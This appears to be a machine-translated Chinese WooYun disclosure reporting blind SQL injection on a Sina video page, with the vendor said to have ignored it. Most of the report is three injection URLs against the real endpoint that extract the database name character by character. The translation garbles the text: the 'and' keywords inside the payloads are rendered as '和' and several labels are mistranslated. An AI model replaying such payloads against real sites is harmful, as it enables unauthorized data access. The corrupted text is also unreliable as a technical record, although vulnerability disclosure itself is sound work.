漏洞标题 新浪站SQL注入 相关制造商 新浪 漏洞作者 过路人 提交时间 2016-06-27 15: 15 公共时间 2016-06-28 11: 35 漏洞类型 SQL注入漏洞 危险等级 在 自我评估等级 6 漏洞状态 该漏洞已通知供应商,但供应商忽略了该漏洞 标签标签 SQL 漏洞详细信息 WooYun:马铃薯网站SQL注入 这..我看到徽标就是你的照片..顺便说一句,我试过了。 http://kan.sina.com.cn/game/game_video?game_name=%E8%8B%B1%E9%9B%84%E8%81%94%E7%9B%9F%27和substring(database(),1, 1)='g'和'x'='x 数据库中的第一个位置是g http://kan.sina.com.cn/game/game_video?game_name=%E8%8B%B1%E9%9B%84%E8%81%94%E7%9B%9F%27和substring(database(),2, 1)='t'和'x'='x 第二个是t http://kan.sina.com.cn/game/game_video?game_name=%E8%8B%B1%E9%9B%84%E8%81%94%E7%9B%9F%27和substring(database(),3, 1)='v'和'x'='x 第三位是v 漏洞证明: 也许马铃薯叫你的api,也许它是通用的? 修理计划: 过滤+ waf 版权声明:请注明出处。居民A @乌云